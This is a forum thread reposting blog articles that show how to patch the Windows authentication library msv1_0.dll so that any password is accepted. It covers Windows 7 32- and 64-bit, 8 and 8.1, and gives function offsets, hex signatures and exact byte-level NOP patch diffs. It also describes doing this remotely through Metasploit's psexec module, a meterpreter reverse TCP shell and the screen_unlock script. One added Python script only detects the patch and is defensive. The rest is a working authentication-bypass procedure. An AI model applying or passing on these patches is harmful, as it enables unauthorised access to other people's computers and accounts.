萝卜头IT论坛

[Experience sharing] How msv1_0.dll is used to bypass system login verification (in English)

Posted on 2014-2-13 21:19:18
Original title: Unlocking Windows 7 SP1 locked screen remotely

Those concerned know about the msv1_0.dll function MsvpPasswordValidate in Windows operating systems. A useful script for unlocking a locked workstation in Metasploit Meterpreter is called screen_unlock.rb. It works well, but the signatures and offsets are a little outdated as they are missing Win7 SP1 and the latest XP SP3 msv1_0.dll security update.
As Microsoft ships newer versions of msv1_0.dll we need to manually search using a debugger for offsets and signatures, as the old ones won't work anymore. In this article I will explain how to do it using the freeware IDA disassembler v. 5.0 and the msv1_0.dll from Win7 SP1 32bit.
For 64-bit Windows 7 the approach is the same; I don't have access to it at this moment.
Okay, so here we are stuck with Win7 SP1 with all updates… and the screen_unlock script bails out with: found signature does not match.
Well, time to get our hands dirty and do some disassembly; it's not as hard as it looks.
Load IDA and create a new “PE Dynamic Library” Disassembly Database, load c:\windows\system32\msv1_0.dll
Once loaded we need to search for the MsvpPasswordValidate function signature:
[Image: 1.jpg]

Take note of the start address, it's 6D48E26D; from this we know that the MsvpPasswordValidate signature offset is 0xe26d.
Next we need to verify the HEX signature of this function, so switch to hex view in IDA and see:
[Image: 2.jpg]

The signature is 8BFF558BEC81EC88000000A1, which pretty much stays the same since Vista SP0.
Okay, now the hard part: we need to find a function that checks the user input password and compares the hashes in memory. This function is called RtlCompareMemory and we need to look for this pattern and stay within the 6D48Exxx offset range. There are tons of obfuscations in there so look towards the end of the map.


[Image: 3.jpg]

This is the pattern we are looking for! What happens here is this compares the two password hashes and if they don’t match it jumps to the incorrect password return value. We need to short-circuit the whole process and replace “jnz loc_6D49776B” with our bypass patch, which will take us directly to the end of the function with NOP so that we can use any password.
So here we have this in HEX:

[Image: 4.jpg]
So take note of the value 0F8550940000; this is our original_code, and its offset at 6D48E315 is 0xe315.
The NOP in hex would be 909090909090, so this would be our patch code.
... (a part omitted) ...
So if you need to unlock a locked Win7 computer on a Windows Domain, Metasploit and the /exploit/windows/psexec module are your friends. Just select the meterpreter reverse tcp and once you have a shell on the remote system, run the script. Remember that once the memory is patched and the user who locked the screen is part of a domain you need to immediately revert the patching by issuing the “screen_unlock -r” command after you log into Win7 with ANY password, or the domain account will be locked after a while. Also any local account can be bypassed with ANY password… hint hint…
It could be used as a nice magic trick on some sysadmins… think of a password my friend and set your account to this password… now abracadabra… I know it! Oh well... whatever.


Reposted from: http://astr0baby.wordpress.com/2011/09/20/unlocking-windows-7-sp1-locked-screen-remotely/

Original poster | Posted on 2014-2-13 21:24:20
The original author also wrote articles about Win8 64-bit and Win8.1 64-bit, which I am reposting here as well.

[Image: logo.jpg]

I’ve always wondered what this logo reminds me of… wait, it was an old Greek state flag from 1822 – 1969. The colors were used in the Greek revolution when they fought the Ottoman Empire.
OK, now we move next to the latest OS from Microsoft -> Windows 8 Pro 64bit. There seems to be a big void in the description of various functions inside the library, so it makes debugging harder, but not impossible. I had to go manually through all the functions to check for our RtlCompareMemory friends and find the correct section which needs to be patched. There seems to be incomplete info on the Microsoft Symbol Server for the PDB of msv1_0.dll (or at least this is how I understand this).
[Image: pdb.jpg]
So after a careful analysis I came up with the following anonymous function that should correspond to MsvpPasswordValidate:
[Image: win8-01.jpg]
It is: sub_18001014C
Next we look for the RtlCompareMemory function and patch our jnz loc with NOP; in this case it is starting with loc_1800101F0 and jnz_loc 18001B4B7.
So we open it in HEX view and do our modifications of the jnz_loc 18001B4B7:
[Image: win8-03.jpg]
  msv1_0.dll
  0000F609: 0F 90
  0000F60A: 85 90
  0000F60B: A8 90
  0000F60C: B2 90
  0000F60D: 00 90
  0000F60E: 00 90

Here is the patch for the file. Use ida_patcher.exe to patch the original msv1_0.dll and test in your lab.

Many thanks to the master astr0baby!!

Original poster | Posted on 2014-2-13 21:29:09
There is also one for Windows 8.1 64-bit. Original title: Windows 8.1 64bit msv1_0.dll patch update

Recently Microsoft has issued a Consumer Preview for public download of Windows 8.1. I have gone through the msv1_0.dll file to look for the msvppasswordvalidate function in the dll and patch the corresponding section with a bypass code. There are slight changes from the previous release of course, which are described below. Still searching for a reliable way to do this via the Metasploit meterpreter screen_unlock.rb script for the 64bit platform (no problem for 32bit). But like in the previous example, a local patch of msv1_0.dll is required for this demo.

[Image: win8-1-01.jpg]

The mysterious function that we are interested in is SUB_18000588C msvppasswordvalidate
Again a quick view in HEX: the equivalent of JNZ LOC_1800432C0 is
0F 85 EB 26 02 00

[Image: win8-1-02.jpg]

Patching this value with 90 90 90 90 90 90 we successfully bypass any local authentication via msv1_0.dll in Windows 8.1 (any password you type will do etc…)
Here is the patch diff:
  msv1_0.dll
  0001FFCF: 0F 90
  0001FFD0: 85 90
  0001FFD1: EB 90
  0001FFD2: 26 90
  0001FFD3: 02 90
  0001FFD4: 00 90

Patch the original dll using ida_patcher.exe and replace the msv1_0.dll in C:\Windows\System32\msv1_0.dll with the patched dll. I have used a Linux live CD with ntfs-3g drivers to do this for the demo.

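A defender-side check for the byte diffs listed in the two posts above, as an added example that is not part of the original posts or of astr0baby's articles: it parses the `offset: original patched` lines in the form shown on this page and reports whether a copy of msv1_0.dll (for instance one pulled from an offline disk image) carries the original bytes, the NOP patch, or neither at those offsets. The function names and the zero-filled sample buffer are constructed for illustration, and the offsets are assumed to be file offsets.

```python
import re

# Diff lines as shown in the posts: "OFFSET: ORIGINAL PATCHED" (hex), assumed to be file offsets.
DIFF_LINE = re.compile(r"^\s*([0-9A-Fa-f]{8}):\s+([0-9A-Fa-f]{2})\s+([0-9A-Fa-f]{2})\s*$")

# The Windows 8.1 64-bit diff, copied from the post above.
WIN81_DIFF = """\
msv1_0.dll
0001FFCF: 0F 90
0001FFD0: 85 90
0001FFD1: EB 90
0001FFD2: 26 90
0001FFD3: 02 90
0001FFD4: 00 90
"""

def parse_diff(text):
    """Return [(offset, original_byte, patched_byte), ...]; other lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = DIFF_LINE.match(line)
        if m:
            entries.append(tuple(int(g, 16) for g in m.groups()))
    return entries

def classify(image, entries):
    """Compare file bytes with the diff: 'original', 'patched', 'mixed' or 'unknown'."""
    if not entries or any(off >= len(image) for off, _, _ in entries):
        return "unknown"  # empty diff, or file too short to be the build the diff targets
    states = set()
    for off, orig, patched in entries:
        b = image[off]
        states.add("original" if b == orig else "patched" if b == patched else "unknown")
    if "unknown" in states:
        return "unknown"  # bytes match neither side: different build or some other change
    return states.pop() if len(states) == 1 else "mixed"

def check_file(path, diff_text):
    """Read a DLL copy from disk (read-only) and classify it against the diff."""
    with open(path, "rb") as fh:
        return classify(fh.read(), parse_diff(diff_text))

def sample_image(patched):
    # Constructed stand-in for a DLL image: zero filler plus the six bytes of interest.
    buf = bytearray(0x20000)
    for off, orig, new in parse_diff(WIN81_DIFF):
        buf[off] = new if patched else orig
    return bytes(buf)
```

An "unknown" result only means the file is a different build from the one the diff was made for; comparing the file's hash against a known-good copy of the same build remains the authoritative integrity check.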

Original poster | Posted on 2014-2-13 21:32:38
Adding one more, for Windows 7 64-bit:
Fun with msv1_0.dll in Windows 7 SP1 64bit

Recently I was able to look at the 64bit version of Windows 7 and check the MsvpPasswordValidate within the msv1_0.dll to see if it is possible to NOP the TRUE/FALSE RtlCompareMemory function when we compare hashes in memory.
It is actually much simpler than the Win7 SP1 32bit version of the library; with so many fewer objects in IDA-view it was very easy to find the function and replace it with NOP.
So in my demonstration I’m using IDA-pro (for 64bit DLLs) and a patch utility called ida_patcher.c (download it from IDA and compile using Visual Studio Express 2010) to diff the results against the msv1_0.dll
[Image: msv01.jpg]


So we search for the function MsvpPasswordValidate within the msv1_0.dll and check the following section in the IDA-view

[Image: msv02.jpg]

Looks simple, right? So next we need to highlight the jnz loc_7FF735183A4
and switch to hex view so that we can see the part which we can patch like so:
[Image: msv04.jpg]

Next we patch the highlighted hex strings with NOP, so instead of 0F 85 7C 80 00 00 we will have 90 90 90 90 90 90

[Image: msv06.jpg]

Then we produce a DIFF file with our changes which we can then patch using the ida_patcher.exe

[Image: msv07.jpg]

So the final command would be > ida_patcher.exe -i msv1_0.dll -p msv1_0.dll.patch
The resulting msv1_0.dll (which we have copied from the C:\windows\system32 to another location, right?) can be used to authenticate with any password against Win7 64 SP1. For the test’s sake I’ve just replaced the original msv1_0.dll with the patched one and I can log in with any password imaginable. Nothing groundbreaking, but still could be used as a nice magic trick to amuse kids in your local IT class.

Reposted from: https://astr0baby.wordpress.com/2012/09/18/fun-with-msv1_0-dll-in-windows-7-sp1-64bit/

Since this is meant for people with a certain level of skill, I won't translate it.

